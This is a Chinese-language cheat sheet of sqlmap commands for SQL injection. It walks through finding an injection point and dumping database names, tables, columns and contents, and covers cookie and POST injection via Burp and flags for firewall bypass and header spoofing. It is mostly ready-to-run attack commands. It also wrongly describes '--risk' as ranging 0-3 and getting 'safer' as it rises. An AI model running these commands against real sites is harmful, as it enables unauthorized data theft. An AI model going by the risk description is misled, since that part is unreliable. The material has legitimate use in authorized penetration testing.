1. sqlmap一把梭:
    2. 注意:命令为kali linux中运行的 windows中用python sqlmap.py执行)
    3. 注入六连:
    4. 1.sqlmap-u "http://www.xx.com?id=x"查询是否存在注入点
    5. 2.--dbs 检测站点包含哪些数据库
    6. 3.--current-db 获取当前的数据库名
    7. 4.--tables -D "db_name"获取指定数据库中的表名 -D后接指定的数据库名称
    8. 5.--columns -T "table_name"-D "db_name"获取数据库表中的字段
    9. 6.--dump-C "columns_name"-T "table_name"-D "db_name"
    10. 获取字段的数据内容
    11. COOKIE注入:
    12. sqlmap -u "http://www.xx.com/xxx.asp"--cookie "id=XXX cookie"--level 2
    13. cookie注入 后接cookie
    14. POST注入:
    15. 1)目标地址http:// www.xxx.com /login.asp
    16. 2)打开burp代理
    17. 3)点击表单提交
    18. 4burp获取拦截信息(post
    19. 5)右键保存文件(.txt)到指定目录下
    20. 6)运行sqlmap并执行如下命令:
    21. 用例:sqlmap -r okay.txt -p username
    22. // -r表示加载文件(及步骤(5)保存的路径)
    23. -p指定参数(即拦截的post请求中表单提交的用户名或密码等name参数)
    24. 7)自动获取表单:--forms自动获取表单
    25. 例如:sqlmap -u www.xx.com/login.asp --forms
    26. 8)指定参数搜索:--data
    27. 例如:sqlmap -u www.xx.com/login.asp --data "username=1"
    28. 常用指令:
    29. 1.--purge 【重新扫描(--purge 删除原先对该目标扫描的记录)
    30. 2.--tables 【获取表名
    31. 3.--dbs 【检测站点包含哪些数据库
    32. 4.--current-db 【获取当前的数据库名
    33. 5.--current-user 【检测当前用户
    34. 6.--is-dba 【判断站点的当前用户是否为数据库管理员
    35. 7.--batch 【默认确认,不询问你是否输入
    36. 8.--search 【后面跟参数 -D -T -C 搜索列(C),表(T)和或数据库名称(D
    37. 9.--threads 10【线程,sqlmap线程最高设置为10
    38. 10.--level 3sqlmap默认测试所有的GETPOST参数,当--level的值大于等于2的时候也会测试HTTP Cookie
    39. 的值,
    40. 当大于等于3的时候也会测试User-AgentHTTP Referer头的值。最高为5
    41. 11.--risk 3【执行测试的风险(0-3,默认为1risk越高,越慢但是越安全
    42. 12.-v 【详细的等级(0-6)
    43. 0:只显示Python的回溯,错误和关键消息。
    44. 1:显示信息和警告消息。
    45. 2:显示调试消息。
    46. 3:有效载荷注入。
    47. 4:显示HTTP请求。
    48. 5:显示HTTP响应头。
    49. 6:显示HTTP响应页面的内容
    50. 13.--privileges 【查看权限
    51. 14.--tamper xx.py,cc.py 【防火墙绕过,后接tamper库中的py文件
    52. 15.--method "POST"--data "page=1&id=2"POST方式提交数据
    53. 16.--threads number  【采用多线程 后接线程数
    54. 17.--referer ""【使用referer欺骗
    55. 18.--user-agent ""【自定义user-agent
    56. 19.--proxy “目标地址″ 【使用代理注入
    57. sqlmap常用路径:
    58. 1.添加表字段的目录在/usr/share/sqlmap/txt/common-tables.txt
    59. 2.存放扫描记录的目录在/root/.sqlmap/output
    60. 高阶玩法:自己写py脚本